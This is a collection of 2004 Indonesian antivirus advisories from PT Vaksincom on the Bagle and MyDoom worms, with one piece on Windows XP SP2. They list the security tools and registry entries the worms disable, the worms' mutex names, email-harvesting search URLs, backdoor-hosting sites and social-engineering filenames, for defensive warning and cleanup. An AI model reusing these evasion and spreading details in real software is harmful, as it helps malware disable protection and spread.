SPF.EXE
SPHINX.EXE
SPYXX.EXE
SS3EDIT.EXE
ST2.EXE
SUPFTRL.EXE
SUPPORTER5.EXE
SYMPROXYSVC.EXE
SYSEDIT.EXE
TASKMON.EXE
TAUMON.EXE
TAUSCAN.EXE
TC.EXE
TCA.EXE
TCM.EXE
TDS2-98.EXE
TDS2-NT.EXE
TDS-3.EXE
TFAK5.EXE
TGBOB.EXE
TITANIN.EXE
TITANINXP.EXE
TRACERT.EXE
TRJSCAN.EXE
TRJSETUP.EXE
TROJANTRAP3.EXE
UNDOBOOT.EXE
UPDATE.EXE
VBCMSERV.EXE
VBCONS.EXE
VBUST.EXE
VBWIN9X.EXE
VBWINNTW.EXE
VCSETUP.EXE
VFSETUP.EXE
VIRUSMDPERSONALFIREWALL.EXE
VNLAN300.EXE
VNPC3000.EXE
VPC42.EXE
VPFW30S.EXE
VPTRAY.EXE
VSCENU6.02D30.EXE
VSECOMR.EXE
VSHWIN32.EXE
VSISETUP.EXE
VSMAIN.EXE
VSMON.EXE
VSSTAT.EXE
VSWIN9XE.EXE
VSWINNTSE.EXE
VSWINPERSE.EXE
W32DSM89.EXE
W9X.EXE
WATCHDOG.EXE
WEBSCANX.EXE
WGFE95.EXE
WHOSWATCHINGME.EXE
WHOSWATCHINGME.EXE
WINRECON.EXE
WNT.EXE
WRADMIN.EXE
WRCTRL.EXE
WSBGATE.EXE
WYVERNWORKSFIREWALL.EXE
XPF202EN.EXE
ZAPRO.EXE
ZAPSETUP3001.EXE
ZATUTOR.EXE
ZAUINST.EXE
ZONALM2601.EXE
ZONEALARM.EXE

Selain itu Bagle.AF "membalas dendam" dengan menghapus registri yang mengandung payload Netsky sehingga secara efektif membersihkan virus Netsky pada komputer yang yang terinfeksi Bagle.AF. Adapun registri yang dihapus oleh Bagle.AF dari kunci registri :

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

adalah yang mengandung kata sebagai berikut :

"My AV"
"Zone Labs Client Ex"
"9XHtProtect"
"Antivirus"
"Special Firewall Service"
"service"
"Tiny AV"
"ICQNet"
"HtProtect"
"NetDy"
"Jammer2nd"
"FirewallSvr"
"MsInfo"
"SysMonXP"
"EasyAV"
"PandaAVEngine"
"Norton Antivirus AV"
"KasperskyAVEng"
"SkynetsRevenge"
"ICQ Net"

Jangan rancu dengan nama registri yang seakan-akan seperti program antivirus Panda, Kaspersky atau Norton. Nama tersebut "dipalsukan" oleh Netsky pada registri untuk menyamarkan dirinya. Semoga hal ini tidak mengundang pembalasan dari "pemilik" Netsky yang lain karena hal ini kembali akan menyebabkan perang worm.

Selain itu, untuk mencegah Netsky membasminya, Bagle.AF akan menyarukan dirinya seakan-akan virus Netsky dengan membuat 7 pengenal / mutex :

MuXxXxTENYKSDesignedAsTheFollowerOfSkynet-D
'D'r'o'p'p'e'd'S'k'y'N'e't'
_-oOaxX|-+S+-+k+-+y+-+N+-+e+-+t+-|XxKOo-_
[SkyNet.cz]SystemsMutex
AdmSkynetJklS003
____--->>>>U<<<<--____
_-oO]xX|-S-k-y-N-e-t-|Xx[Oo-_

Menjadikan komputer korbannya sebagai Spam Server

Komputer yang terinfeksi Bagle.AF akan membuka port 1080 dan seperti pada kasus Bagle terdahulu, pencipta Bagle dapat mengendalikan komputer yang terinfeksi denngan password yang telah ditentukan terlebih dahulu. Pencipta Bagle.AF dapat mengetahui komputer yang terinfeksi Bagle karena secara otomatis komputer korban Bagle.AF akan mengirimkan IP dirinya ke 142 domain yang mayoritas berlokasi di Jerman (sehingga diduga kemungkinan besar pembuat Bagle.AF ini berasal dari Jerman). Adapun beberapa dari 142 domain yang dihubungi secara otomatis oleh komputer korban Bagle.AF adalah www.tripod.de; www.atlas-hannover.de; www.lufthansa.de dan www.bundesliga.de. Menurut perkiraan kami, hanya beberapa dari 142 domain ini yang akan mengumpulkan IP yang terinfeksi Bagle.AF dan pengiriman ke domain yang sangat banyak ini (yang umumnya merupakan website perusahaan besar dan bonafid) merupakan upaya untuk mempersulit / memperlambat penegak hukum melacak domain yang sebenarnya mengumpulkan IP korban Bagle.AF.

Pada prinsipnya, apapun dapat dilakukan pada komputer yang terinfeksi tetapi penyalahgunaan yang dilakukan adalah menjadikan komputer korban sebagai mailserver untuk mengirimkan spam. Seperti kita ketahui setiap server email yang mengirimkan spam akan diblok IPnya dan dicap sebagai black list, tetapi jika komputer korban Bagle yang menyebarkan spam, otomatis akan menyulitkan untuk memblok IP tersebut karena IP ini biasanya milik ISP dan sifatnya Dynamic IP (digunakan oleh banyak pelanggan dial up).

Terdeteksi tanpa membutuhkan update oleh Norman Virus Control dengan teknologi Sandbox

Bagle.AF akan terdeteksi oleh Norman Virus Control tanpa membutuhkan update karena Norman memiliki teknologi Sandbox sebagai W32/P2PWorm. Dengan update tanggal 16 Juli 2004, akan terdeteksi sebagai W32/Bagle.AE.

Saat ini Bagle.AF terdeteksi menyebar di Canada dan Amerika Serikat, namun diperkirakan paling lambat hari Senin tanggal 19 Juli 2004 Bagle.AF sudah sampai ke Indonesia, karena itu kami harapkan anda untuk SEGERA melakukan update definisi antivirus anda.

salam,

AAT

PT. Vaksincom

Gedung Rifa lt. IV

Prof. Dr. Satrio blok C4/ 6-7

Jakarta 12950

Telp : 021-5260787

http://www.vaksin.com

Email : info@...

W32/MyDoom.L/O@mm           27 Juli 2004

Menggunakan Search Engine memanen email

       10 hari setelah Bagle.AF muncul dan mengganas di seantero dunia, virus baru yang tidak kalah canggihnya menyebar dengan kecepatan cukup tinggi. Virus ini tidak memanfaatkan jeda weekend untuk menyebarkan diriya dan memilih hari biasa untuk menyebarkan dirinya. MyDoom.O atau dikenali oleh Norman Virus Control sebagai W32/MyDoom.L@mm menyebar dengan kecepatan cukup tinggi dan satu keunikan yang dimiliki MyDoom.O adalah aksinya mengumpulkan email dari empat search engine seperti diberitakan di Detikcom, Varian MyDoom Perlambat Google.

http://www.detikinet.com/index.php/detik.read/tahun/2004/bulan/07/tgl/27/time/11126/idnews/181996/idkanal/110. Secara tidak langsung aksi MyDoom.O ini dapat dikategorikan sebagai "Technical Ddos", terbukti dengan pengakuan dari Google dan Yahoo bahwa akses ke website mereka mengalami perlambatan, tapi pada saat ini masalah tersebut kelihatannya dapat teratasi karena akses ke Google, Yahoo, Lycos dan Altavista tidak mengalami perlambatan yang berarti. Dibandingkan dengan kasus MyDoom.F dimana SCO.com di Ddos sampai lumpuh maka dapat diambil kesimpulan bahwa infeksi MyDoom.O ini masih kalah banyak dibandingkan MyDoom.F. Sampel MyDoom.O pertama yang diterima PT. Vaksincom datang dari salah satu ISP Indonesia dengan IP 203.130.229.XXX. Norman Virus Control dengan teknologi Sandbox tanpa update sekalipun dapat mengenali MyDoom.O ini sebagai W32/EmailWorm, sedangkan dengan update tanggal 26 Juli 2004 akan terdeteksi sebagai W32/MyDoom.L@mm. Hal lain yang harus diperhatikan dengan MyDoom.O ini adalah kemampuannya menanamkan Backdoor ke dalam komputer yang terinfeksi sehingga komputer korban MyDoom.O akan dapat dikendalikan secara remote.

Datang dalam bentuk eksekutable dan zip dan memalsukan alamat pengirim email.

Email yang mengandung MyDoom.O akan datang dalam bentuk .zip terkompres dan eksekutable :

• .COM
• .SCR
• .EXE
• .PIF
• .BAT

Gambar 1, Email yang mengandung MyDoom.O datang dalam lampiran terkompres

Jika lampiran yang datang bentuknya terkompres, maka nama file terkompres dan nama file eksekutabelnya yang mengandung MyDoom.O akan diberi nama sesuai dengan nama domain penerima email. Dalam email MyDoom.O yang diterima Vaksin terlihat bahwa nama lampiran yang datang adalah vaksin.com.zip, sedangkan nama eksekutabel yang terkompres adalah vaksin.com. Selain itu, alamat email pengirim juga akan dipalsukan sehingga anda tidak perlu melakukan reply pada sender email jika anda menerima MyDoom.O.

MyDoom.O akan mengkopikan dirinya sebagai aplikasi dengan nama java.exe dan mendaftarkan dirinya ke registri HKLM\Software\Microsoft\Windows\CurrentVersion\Run\JavaVM sehingga akan secara otomatis dijalankan oleh Windows pada saat pertama kali start. Selain itu MyDoom.O juga menanamkan bom waktu berupa Backdoor yang akan membukakan port 1034 sehingga komputer yang terinfeksi MyDoom.O akan dapat diambil alih untuk dikendalikan secara remote. Adapun Backdoor yang digunakan adalah Backdoor.Zincite.A dan akan diaktifkan pada registri HKCU\Software\Microsoft\Windows\CurrentVersion\Run\JavaVM  dengan nama aplikasi services.exe

Memanen alamat email dari Search Engine

MyDoom akan mengumpulkan alamat email dari harddisk korbannya dari file dengan ekstensi PL*, PH*, TX*, HT*, ASP, TBB, SHT*, WAB, ADB dan DBX serta Address Book Windows. Selain itu, seperti yang kami utarakan di atas, MyDoom.O akan menggunakan search engine Yahoo, Google, Altavista dan Lycos dengan alamat detail :

http://search.lycos.com/default.asp?lpv=1&loc=searchhp&tab=web&query=%s

http://www.altavista.com/web/results?q=%s&kgs=0&kls=0

http://search.yahoo.com/search?p=%s&ei=UTF-8&fr=fp-tab-web-t&cop=mss&tab=

http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=%s

dan memasukkan domain dari email yang di dapatkannya untuk mendapatkan lebih banyak lagi alamat email. Sebagai contoh, MyDoom.O mendapatkan alamat korban@... pada komputer korbannya, maka ia akan memasukkan domain isp.net.id ke search engine untuk mendapatkan lebih banyak alamat email dari domain tersebut. Menurut pengetesan yang kami lakukan, hasil maksimal didapatkan virus ini jika menggunakan search engine Altavista dan Lycos. Sedangkan usaha memanen email dari Google dan Yahoo tidak memberikan hasil alamat email.

Gambar 2, Pencarian domain di Google tidak menghasilkan alamat email

Gambar 3, Pencarian Domain indo.net.id di altavista.com menghasilkan cukup banyak email baru

Mengandung Backdoor Zincite

Anda harus berhati-hati dengan MyDoom.O karena selain menghabiskan bandwidth email dan internet dalam usaha menyebarkan dirinya, MyDoom juga mengkopikan Backdoor.Zincite.A yang akan membuka lubang pada port 1034 sehingga komputer tersebut dapat diambil alih secara remote.

Bagaimana kalau komputer syaa sudah terinfeksi MyDoom.O

Jika komputer anda sudah terinfeksi MyDoom.O, kami sarankan anda lakukan langkah berikut :

1. Jika Anda menggunakan Windows ME/XP, nonaktifkan system restore selama masa pembersihan

2. Update antivirus yang anda gunakan, jika tidak menggunakan Norman Virus Control dengan teknologi Sandbox anda harus menggunakan update minimal 26 Juli 2004.

3. Jika komputer Anda terhubung ke jaringan, lepaskan terlebih dahulu.

4. Restart komputer di safe mode (pada saat start komputer tekan tombol [F5])

5. Scan dan delete semua file yang terdeteksi sebagai W32/MyDoom.O@mm.

6. Gunakan tools MyDoom.O removal yang dapat anda download dari http://www.f-secure.com/tools/f-mydoom.exe atau http://securityresponse.symantec.com/avcenter/FxMydoom.exe

7. Untuk sementar blok TCP port 1034 pada Firewall yang digunakan

Alfons Tanujaya

PT. Vaksincom

Gedung Rifa lt. IV

Prof. Dr. Satrio blok C4 / 6-7

Jakarta 12950

Telp : 62-21-526 -787 / 752

http://www.vakisn.com

Email : info@...

W32/Bagle.AI@mm               10 Agustus 2004

Menyebarkan diri dengan memanfaatkan 204 website

Alias : JS.Bagle.AG, Win32/Bagle.AG.Worm, W32/Bagle.AJ@mm (F-Secure), I-Worm.Bagle.al (Kaspersky), W32/Bagle.aq@MM (McAfee), W32.Beagle.AO@mm(Symantec), JScript/IE.VM.Exploit, Win32/WDirect.DLL.Worm, Win32/WDirect.DLL.Worm, Win32/WDirect.Trojan

Boleh saja Netsky menang dalam pertempuran "War of the Virus" di paruh pertama tahun 2004 dimana sampai bulan Juli 2004 jumlah virus Netsky (dan variannya) yang terdeteksi mencapai beberapa kali lipat dibandingkan Bagle (dan variannnya). Tetapi dengan tertangkapnya arsitek penyebar Netsky yang ternyata seorang remaja Jerman Sven Jaschan, boleh dikatakan praktis Netsky sudah tidak mengeluarkan variannya yang berarti lagi. Sedangkan Bagle dan Mydoom (MyDoom.O) sampai saat ini masih aktif menyebarkan dirinya, kesimpulan "sementara" dalam lari Sprint Netsky lari jauh melebihi Bagle, tetapi dalam lari Marathon Netsky kalah "napas" dibandingkan Bagle karena terlalu bernafsu untuk menang sehingga malahan tertangkap dan tidak bisa mengikuti "pertandingan" lagi. Sekarang yang tertinggal adalah pertandingan antara pembuat antivirus dengan pembuat virus. Seolah meledek Netsky, varian Bagle.AI kembali muncul dan tidak lupa memasukkan beberapa string pada dirinya agar tidak dapat dihapus oleh Netsky. Hebatnya, Bagle.AI muncul dengan metode yang berbeda dengan Bagle lainnya karena virusnya sendiri disebarkan di ratusan alamat website menyaru sebagai file gambar menunggu untuk di download oleh komputer korban yang berhasil dieksploitasi melalui email.

Empat komponen utama

Keunikan Bagle.AI adalah pada pemisahan worm itu sendiri dengan email penyebarannya. Email yang datang sebenarnya tidak mengandung virus, hanya mengandung file HTML, Downloader worm dan .DLL, sedangkan wormnya sendiri akan di download secara otomatis oleh downloader worm dari 204 alamat website yang telah dipersiapkan sebelumnya. Untuk lebih jelasnya proses penyebarannya adalah sebagai berikut :

• Penerima email akan mendapatkan email yang mengandung lampiran dalam bentuk terkompres (.zip) yang mengandung file HTML, Downloader worm yang mirip dengan Trojan Mitglieder dan DLL yang akan disuntikkan ke dalam proses Explorer sehingga untuk mematikan proses ini harus mematikan proses explorer.exe :(. Sebagai contoh, lampiran yang datang namanya price.zip, ia akan mengandung dua file dengan nama price.html dan price.exe (status hidden).

• Jika lampiran dimekarkan dan file price.html dijalankan, file ini secara otomatis akan menjalankan file hidden price.exe karena file price.html ini mengandung eksploitasi atas celah keamanan Internet Explorer (Object Data Vulnerability).

• Price.exe yang merupakan downloader virus akan berusaha menghubungi salah satu dari 204 alamat website untuk mendownload file dengan nama 2.jpg. Walaupun namanya 2.jpg, sebenarnya file inilah yang berisi worm Bagle.AI.

Hati-hati dengan lampiran yang mengandung kata price.

Email yang mengandung rutin yang mengaktifkan Bagle.AI ini akan datang dalam bentuk terkompres semuanya dan nama semua lampirannya mengandung kata "price". Secara lebih detil, lampiran yang mengandung Bagle.AI ini adalah sebagai berikut :

price.zip
price2.zip
price_new.zip
price_08.zip
08_price.zip
newprice.zip
new_price.zip
new__price.zip

Adapun berita yang terkandung dalam email ini adalah "New Price", sedangkan alamat pengirim dipalsukan oleh Bagle.AI dan Subjectnya kosong. Untuk administrator mailserver yang proaktif, bisa dipertimbangkan untuk menjaga semua lampiran email yang mengandung kata price dan datang dalam bentuk kompresi zip (untuk kondisi darurat pemblokan lampiran ini bisa dilakukan namun kami tidak menyarankan untuk diterapkan secara permanen karena semua lampiran yang mengandung kata price walaupun ditak mengandung virus akan ikut terblok).

Membuka port 80 UDP dan TCP

Bagle.AI akan mengandung fungsi Backdoor dimana ia akan membuka akses UDP dan TCP pada port 80. Menurut perkiraan, tujuan dari pembukaan port ini adalah untuk menjadikan komputer korban Bagle.AI ini sebagai spam server, karena hal ini akan memungkinkan diaktifkannya "open relay". Hal ini merupakan salah satu ciri khas Bagle, dimana setiap komputer korbannya akan dijadikan sebagai spam server dan hal ini akan sangat merepotkan ISP karena IP pelanggan yang menjadi korban Bagle dan menyebarkan email spam kebanyakan adalah IP Statik pengguna dial up dan jika di blok / blacklist oleh organisasi antispam, pengguna dial up tinggal mematikan dan dial kembali untuk mendapatkan IP baru yang tidak di blok. Tinggal ISP nya yang kerepotan memproses unbloking IP tersebut.

Aksi berbahaya lain yang perlu diwaspadai dari Bagle.AI adalah mematikan beberapa proses program termasuk program sekuriti dan firewall dengan menghapus registri windowsnya, hal ini cukup berbahaya karena akan menyebabkan windows tidak terlindung dari virus lagi karena program antivirusnya dimatikan. Adapun program yang "di incar" antara lain :

• Mengandung kata antivirus

• Kaspersky

• Zonealarm

• Norton Antivirus

• Panda Antivirus

• Skynet (kemungkinan besar bertujuan untuk mematikan virus Netsky)

Selain itu, Bagle.AI juga berusaha menyebarkan dirinya melalui file sharing dengan mengkopikan dirinya pada semua direktori yang mengandung kata *shar* sehingga semua folder yang mengandung kata shar akan mengandung file-file sebagai berikut :

ACDSee 9.exe
Adobe Photoshop 9 full.exe
Ahead Nero 7.exe
KAV 5.0
Kaspersky Antivirus 5.0
Matrix 3 Revolution English Subtitles.exe
Microsoft Office 2003 Crack, Working!.exe
Microsoft Office XP working Crack, Keygen.exe
Microsoft Windows XP, WinXP Crack, working Keygen.exe
Opera 8 New!.exe
Porno Screensaver.scr
Porno pics arhive, xxx.exe
Porno, sex, oral, anal cool, awesome!!.exe
Serials.txt.exe
WinAmp 5 Pro Keygen Crack Update.exe
WinAmp 6 New!.exe
Windown Longhorn Beta Leak.exe
Windows Sourcecode update.doc.exe
XXX hardcore images.exe

Sebenarnya tujuan utama dari aksi ini adalah menyebarkan dirinya ke melalui program P2P (Peer to Peer) seperti Kazaa, namun akibat samping dari aksi ini adalah direktori lain di windows yang mengandung kata shar akan mengandung worm Bagle.AI sehingga kemungkinan pengguna jaringan lokal terinfeksi cukup besar. Apalagi nama file yang dipilih cukup menarik / seram (XXX hardcore, Crack...)

salam,

Alfons Tanujaya

PT. Vaksincom

Gedung Rifa lt. IV

Prof. Dr. Satrio blok C4 / 6-7

Jakarta 12950

Telp : 62-21-526 -787 / 752

http://www.vakisn.com

Email : info@...

W32/MyDoom.S@mm         17 Agustus 2004

Hati-hati dengan lampiran photos_arc.exe

Trend virus terakhir menunjukkan kecenderungan serangan yang lebih efektif dan terarah serta memanfaatkan komputer yang terinfeksi virus terdahulu sebagai agen penyebaran awal. Setelah Bagle.AI yang membuka backdoor pada komputer yang terinfeksi sehingga membuka peluang untuk dikendalikan oleh penyusup, kini sedang beredar worm baru W32/MyDoom.S@mm yang penyebarannya memanfaatkan disinyalir memanfaatkan komputer zombie dengan koneksi broadband dan DSL sebagai agen penyebaran awalnya. Selain memanfaaatkan ribuan komputer zombie sebagai agen penyebaran, MyDoom.S juga mendownload backdoor ke 4 alamat website yang telah disusupi program Backdoor yang diberi nama seakan-akan file gambar. Menurut pemantauan Vaksincom, MyDoom.S telah sampai ke Indonesia sejak 16 Agustus 2004, karena itu kami sarankan kepada para pengguna email untuk berhati-hati terharap lampiran email dengan nama photos_arc.exe dan jangan sekali-kali menjalankan lampiran ini karena akan mengaktifkan virusnya. Selain itu, hal yang perlu diwaspadai adalah adanya libur nasional 17 Agustus 2004 dimana komputer yang terinfeksi akan terus menerus mengirimkan virus (khususnya yang memiliki koneksi broadband) sehingga penyebaran MyDoom.S ini diperkirakan akan cukup tinggi pada saat anda kembali bekerja pada tanggal 18 Agustus 2004.

Datang dalam eksekutable dan satu bentuk email

MyDoom.S akan datang hanya dalam satu jenis email dan lampirannya tidak dalam bentuk .zip, melainkan dalam bentuk eksekutable. Secara detail email yang mengandung MyDoom.S akan datang dalam bentuk sebagai berikut (lihat gambar 1) :

Subject : photos

Lampiran : photos_arc.exe

Gambar 1

Jika anda memblok eksekutable pada mailserver anda, kemungkinan besar email yang mengandung MyDoom.S tidak akan berhasil menembus pertahanan anda. Namun kami sarankan jangan terlena karena sekarang banyak lampiran virus yang akan datang dalam bentuk terkompres .zip. Kecuali anda memblok semua lampiran pada incoming mailserver namun hal ini akan menjadikan email tidak bedanya dengan sms karena hanya mengirimkan teks.

Mendownload Backdoor dan kerancuan nama

Salah satu aksi MyDoom.S adalah ia akan mendownload Backdoor ke empat alamat website, adapun backdoor tersebut dikenali dengan nama Ratos (Trendmicro) atau Nemog (Symantec) atau CHR (McAfee). karena aksinya inilah Trendmicro sempat mengidentifikasi MyDoom.S sebagai Worm Ratos, namun guna menghindari kerancuan penamaan dan karena worm yang terkandung pada email memang bukan Ratos melainkan worm yang memiliki kesamaan dengan keluarga MyDoom, akhirnya Trendmicro sepakat untuk mengganti nama Ratos menjadi MyDoom. Hal ini secara tidak langsung menunjukkan tingginya tingkat penyebaran virus pada tahun 2004 ini, yang walaupun salah satu "gembongnya" Sven Jaschan yang menyebarkan Netsky sudah tertangkap namun penyebar MyDoom dan Bagle masih bebas berkeliaran dan menjalankan aksinya.

Adapun Backdoor yang ditanamkan diletakkan pada situs www.richcolour.com dan www.zenandjuice.com. Dengan cerdik, backdoor tersebut menyaru sebagai file gambar karena diberi akhiran .jpg dan .gif, namun sekali berhasil di download, file ini akan diganti menjadi winvpn32.exe dan langsung dijalankan pada komputer korban. Menurut pemantauan Vaksin.com, pada tanggal 16 Agustus 2004 pukul 22.30 WIB situs yang mengandung backdoor tersebut masih aktif dan belum dimatikan (Lihat gambar 2 dan gambar 3).

Gambar 2

Gambar 3

Alamat pengirim tidak dipalsukan

Ada ciri khas dari MyDoom.S ini dimana ada kemungkinan email pengirim virus tidak dipalsukan, melainkan diambil dari registri pada komputer yang terinfeksi :

HKCU\Software\Microsoft\Internet Account Manager\Accounts\<Account>\SMTP Email Address
HKCU\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts\<Account>\SMTP Email Address

Adapun registri yang diakses ini adalah alamat email default pada komputer yang terinfeksi. Selain itu, kemungkinan lain alamat pengirim akan menggunakan domain sebagai berikut :

t-online.de
mail.com
yahoo.com
hotmail.com

Jika anda melihat email mengandung MyDoom.S yang diterima oleh Vaksin.com (gambar 1), dapat disimpulkan bahwa alamat email pengirim virus tersebut adalah otentik dan tidak dipalsukan. Menurut pengecekan IP yang kami lakukan, email tersebut dikiirmkan dari ***cotech.com yang merupakan satu perusahaan industri yang berdomisili di Cibitung, Bekasi, Jawa Barat.

Dalam menyebarkan dirinya, MyDoom.S memiliki rutin SMTP sendiri.

Norman Virus Control dengan teknologi sandbox dapat mendeteksi MyDooom.S dengan baik tanpa memerlukan update dan MyDoom.S akan terdeteksi sebagai W32/EmailWorm. Dengan update tanggal 16 Agustus 2004 terakhir, Norman akan mengenali sebagai MyDoom.M@mm.

MERDEKA !!!

Bandung, 17 Agustus 2004

salam,

Alfons Tanujaya

PT. Vaksincom

Gedung Rifa lt. IV

Prof. Dr. Satrio blok C4 / 6-7

Jakarta 12950

Telp : 62-21-526 -787 / 752

http://www.vakisn.com

Email : info@...

Windows XP SP2                30 Agustus 2004

Tips sebelum instalasi dan masalahnya

Manfaat

Adapun manfaat tambahan yang dikandung oleh WIndows XP adalah sebagai berikut :

• Peningkatan kemampuan Firewall, peningkatan kemampuan WIndows Firewall yang sangat signifikan dibandingkan dengan firewall sebelumnya, Internet Connection Firewall. Namun anda juga akan menemui kenyataan bahwa sekuriti berbanding terbalik dengan kemudahan, karena banyak sekali aplikasi yang bermasalah terutama karena aksi Windows Firewall ini.

• Menekan pop up yang menyebalkan, kalau yang satu ini sangat menyenangkan dan bermanfaat karena akan secara efektif menekan pop up windows yang sangat sering muncul tanpa diundang setiap kali kita mengunjungi website tertentu.

• Mengurangi penyebab crash karena add-ons, kestabilan Windows XP menjadi meningkat karena add-ons yang sebelumnya sering mengakibatkan windows crash berkurang dnegan signifikan.

• Peningkatan kemampuan dan kemudahan dalam akses wireless, selain proses setting wireless yang lebih mudah, kami juga senang dengan logo koneksi wireless yang baru yang membedakan dengan logo koneksi LAN.

• Security Center

Persiapan

Sebelum anda melakukan instalasi SP2 ini, kami sarankan ruang kosong pada system windows (biasanya c:\) lebih besar dari 1.5 GB. Sebenarnya ukuran SP2 dalam keadaan terkompres adalah 266 MB, tetapi setelah dimekarkan ukurannya menjadi 500 MB dan dalam proses instalasi windows memerlukan Temporary file yang cukup besar, apalagi jika anda menginstal menggunakan CD Rom. Jika ruang harddisk anda tidak mencukupi dalam setengah proses instalasi, windows anda berpotensial menjadi hang dan data anda terancam hilang, karena itu, kami menyarankan anda untuk membackup data penting sebelum melakukan instalasi SP2.

Aplikasi yang bermasalah dengan SP2

Langkah terakhir yang harus anda lakukan adalah memastikan bahwa aplikasi yang anda gunakan tidak mengalami masalah dengan Windows XP SP2 atau jika dinonaktifkan oleh WIndows Firewall, anda harus mengaktifkan kembali secara manual dengan membuka port yang ditutup oleh Windows Firewall. Khusus bagi anda yang mengaktifkan automatic download, memiliki satu PC saja dan koneksi broadband kami sarankan untuk memilih automatic download karena ukuran downloadnya akan lebih kecil daripada download seluruh SP2. Namun bagi anda yang terkoneksi melalui dial up dan memiliki beberapa PC dengan OS Windows XP dalam jaringan, kami tidak sarankan untuk mendownload, sebaiknya menginstal menggunakan CD yang dapat anda minta dari Microsoft .

Adapun program-program yang akan mengalami gangguan karena portnya diblok oleh WIndows Firewall adalah sebagai berikut :

• Command Antivirus 4.9

• Etrust EZ Armor 1 (Computer Associate)

• Kaspersky 5

• Norman Personal Firewall 1.4

• Norton Antivirus 2003

• Rational Clearcase 2003

• Norton System Works 2004

• Wordperfect Office 11

• Yahoo Instant Messenger 6

• Zonealarm 4 / 4.5x / 5.0.590

Perhatikan bahwa kebanyakan aplikasi yang bermasalah adalah aplikasi sekuriti, masalah ini sangat penting untuk diperhatikan dan jangan disepelekan karena tidak berfungsinya program sekuriti seperti antivirus atau firewall tentunya akan menyebabkan komputer tidak terlindungi dari virus / serangan berbahaya. Karena itu, kami sarankan untuk menghubungi vendor tempat anda membeli software untuk mendapatkan sollusinya. Sebagai contoh, Norman Personal Firewall 1.4 yang tidak dapat berjalan setelah instal service pack 2 ini memberikan update "gratis" ke versi Norman Personal Firewall 1.41 sehingga komputer akan terlindungi kembali. Satu hal penting yang perlu diperhatikan adalah seperti antivirus, aplikasi Firewall tidak disarankan untuk di instal lebih dari satu pada tiap komputer karena akan menyebabkan sistem komputer menjadi tidak stabil / hang. Anda bisa memilih untuk menonaktifkan WIndows Firewall jika memiliki aplikasi Firewall komersial yang lebih bagus / familiar seperti ZoneAlarm, BlackIce atau Norman Personal Firewall (NPF). Untuk beberapa Firewall yang disertifikasi Microsoft seperti NPF juga akan terintegrasi secara otomatis ke dalam Secuirty Center.

Selain itu, beberapa program lain akan berhenti total setelah instal service pack seperti :

• Symantec Antivirus Corporate Edition 8.0

• Cute FTP

• AutoCAD 2000, 2002, 2004

• Computer Associate Arc Server

• Microsoft SQL 2000a

• Etrust 6.0.100

• Computer Associates aTrust 7.0

• Symantec Antivirus Corporate Edition 8.x dan 9.x

Selain itu, beberapa Game populer juga mengalami masalah dengan SP2 ini antara lain :

• Need for Speed hot Pursuit

• Startrek Starfleet Command III 1.0

• Unreal Tournament 2003

Penyebabnya juga karena port yang ditutup oleh Firewall Windows secara default dan solusinya adalah port tersebut harus dibuka secara manual oleh pengguna windows XP SP2. Caranya adalah dengan menggunakan Netstat untuk mengetahui port mana yang digunakan oleh aplikasi lalu membuka port tersebut pada Windows Firewall.

PS: Terimakasih untuk Michael dan Ian Bonet atas dukungannya dalam pembuatan artikel ini.

salam,

Alfons Tanujaya

PT. Vaksincom

Gedung Rifa lt. IV

Prof. Dr. Satrio blok C4 / 6-7

Jakarta 12950

Telp : 62-21-526 -787 / 752

http://www.vaksin.com

Email : info@...

W32/Bagle.AK        1 September 2004

Jangan klik file HTML dalam .zip

     Setelah Bagle.AI dan MyDoom.S yang mengandung trojan downloader, sekarang muncul worm baru W32/Bagle.AK yang juga mengandung downloader. Kalau MyDoom.S hanya memiliki 4 website yang berbeda untuk download, maka Bagle.AK memiliki daftar 131 website untuk mengupdate dirinya. Bagle.AK di sebarkan secara masif ke internet pada tanggal 1 September 2004 dengan lampiran terkompres .zip dan file di dalamnya berisi file HTML yang jika dijalankan akan secara otomatis mengeksploitasi celah keamanan Microsoft Java Machine untuk menjalankan virus secara otomatis. Unikya, ke 131 website yang terkandung dalam Bagle.AK pada saat ini tidak ada satupun yang aktif. Apakah pembuat virus menunggu waktu yang tepat untuk mengupload file tersebut atau ini hanya tipuan, waktu yang akan memberitahu kita.

Lampiran .zip dengan file HTML yang mengekspoitasi Microsoft VX Activex Components vulnerability

Email yang mengandung Bagle.AK akan datang dalam lampiran .zip dan menurut pengamatan Vaksincom, alamat pengirim dipalsukan oleh virus (forging). Adapun subjeknya adalah foto dengan lampiran fotos.zip. Untuk detilnya silahkan lihat gambar 1.

Gambar 1, email yang mengandung virus Bagle,AK akan datang dalam lampiran fotos.zip

Jika anda memekarkan lampiran ini, anda akan mendapatkan satu file "foto.htm" dan satu direktori dengan nama "1" (Lihat gambar 2).

Gambar 2, hasil unzip lampiran fotos.zip

 Di dalam direktori inilah virus Bagle.AK tersimpan dengan nama "foto1.exe" atau "calc.exe". Adapun rekayasa sosial yang terkandung dalam lampiran ini ada pada file foto.htm, yang seharusnya merupakan file html (hypertext markup language) yang tidak memiliki kemampuan menjalankan kode berbahaya tanpa sepengetahuan pengguna komputer. Tetapi karena file html yang terkandung dalam Bagle.AK ini berisi kode program yang mengeksploitasi celah keamanan Microsoft VX Activex Components vulnerability http://www.microsoft.com/technet/security/bulletin/MS00-075.mspx maka secara otomatis, jika kita mengklik file foto.htm maka file foto.exe / calc.exe akan dijalankan secara otomatis oleh windows sekaligus mengaktifkan virus. Kami sertakan capture dari kode eksploitasi yang terkandung di dalam file foto.htm (gambar 2)

Gambar 2, kode html untuk mengeksploitasi celah keamanan Microsoft VX Activex components

Memiliki daftar 131 website untuk mendownload file b.jpg

Bagle.AK yang dalam keadaan terkompresi ukurannya 5 KB ini juga memiliki Trojan Downloader yang setiap 6 jam sekali berusaha mendownload file ke 131 website yang telah ditentukan dalam codingnya, seperti trik yang digunakan oleh MyDoom.S file yang di download adalah file dengan ekstensi .jpg yang setelah di download akan dirubah ekstensinya untuk dijalankan. Jadi secara teknis Bagle.AK memiliki kemampuan untuk mengupgrade dirinya karena secara otomatis akan menjalankan file yang di download dan perintah apapun dapat dimasukkan ke dalam perintah tersebut dari yang tidak destruktif seperti melakukan spamming, Ddos sampai ke hal yang destruktif seperti menghancurkan file atau memformat harddisk.

